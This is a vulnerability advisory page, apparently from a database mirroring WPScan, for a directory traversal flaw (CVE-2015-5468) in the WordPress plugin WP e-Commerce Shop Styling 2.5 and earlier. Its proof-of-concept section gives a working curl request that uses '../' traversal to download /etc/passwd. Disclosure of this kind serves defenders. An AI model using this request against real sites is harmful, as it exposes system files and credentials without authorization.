Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbLarry W. CashdollarWPVDB-ID:8B9436D4-3950-40FC-8220-4AE8F0E77F9A
HistoryJul 05, 2015 - 12:00 a.m.

WP e-Commerce Shop Styling <= 2.5 - Local File Inclusion

2015-07-0500:00:00
Larry W. Cashdollar
wpscan.com
11

EPSS

0.025

Percentile

90.3%

JSON

The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input to prevent sensitive system files from being downloaded. You’ll have to rename the download file via mv – -…-…-…-…-…-…-…-…-etc-passwd passwd as the filename is set to the download filename with path.

PoC

$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd

Related

cvelist 1
wpexploit 1
nvd 1
cve 1
prion 1
exploitdb 1
threatpost 1
openvas 1
cvelist
cvelist
CVE-2015-5468
2017-05-23 03:56:00
wpexploit
wpexploit
WP e-Commerce Shop Styling <= 2.5 - Local File Inclusion
2015-07-05 00:00:00
nvd
nvd
CVE-2015-5468
2017-05-23 04:29:00
cve
cve
CVE-2015-5468
2017-05-23 04:29:00
prion
prion
Directory traversal
2017-05-23 04:29:00
exploitdb
exploitdb
WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download
2015-07-08 00:00:00
threatpost
threatpost
Attackers Target 1M+ WordPress Sites To Harvest Database Credentials
2020-06-03 20:37:44
openvas
openvas
WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP)
2020-11-20 00:00:00

EPSS

0.025

Percentile

90.3%

JSON
Related for WPVDB-ID:8B9436D4-3950-40FC-8220-4AE8F0E77F9A
cvelist1wpexploit1nvd1cve1prion1exploitdb1threatpost1openvas1